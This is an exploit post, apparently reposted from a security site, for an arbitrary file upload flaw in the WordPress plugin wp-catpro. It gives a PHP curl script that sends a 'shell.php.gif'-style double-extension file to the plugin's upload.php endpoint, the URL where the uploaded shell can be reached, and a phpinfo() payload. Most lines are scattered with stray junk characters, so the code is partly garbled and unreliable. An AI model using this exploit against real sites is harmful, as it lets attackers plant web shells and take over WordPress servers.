WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
+ }/ T  E) J* Q#-----------------------------------------------------------------------

作者  => Zikou-16
8 h$ s0 w& S3 t邮箱 => zikou16x@gmail.com
7 h) M% X* p9 N测试系统 : Windows 7 , Backtrack 5r3
2 d" h! {% A1 l. {0 }( u' ]下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

* E8 u1 k% `4 ~  |! q9 A& d#=> Exploit 信息:
------------------
; P% f' D4 U7 ^6 o+ T# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
& r/ s- ]# l% W" P3 |4 s* S
#=> Exploit
* V8 O1 F2 R$ \* M4 T4 Z  Z-----------
<?php
8 I' m. }' s0 i! q5 f
$uploadfile="zik.php.gif";
& h: _" j! x8 _8 O- l$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
) G* d: @) ?: x6 i, w; S7 f2 O+ q/ Vcurl_setopt($ch, CURLOPT_POSTFIELDS,
9 s) K( A9 N0 Y2 Y6 karray('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
# M4 Z* Q: M8 }2 V) T% L0 n0 [+ N) Jcurl_close($ch);

, o7 ]. [- J. d% v% w5 o1 D, w  \+ zprint "$postResult";
' o9 `' h5 ?* `0 k2 {4 e3 ~2 b( O
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
' E5 v$ W5 |& B1 J- s) `$ P<?php
phpinfo();
?>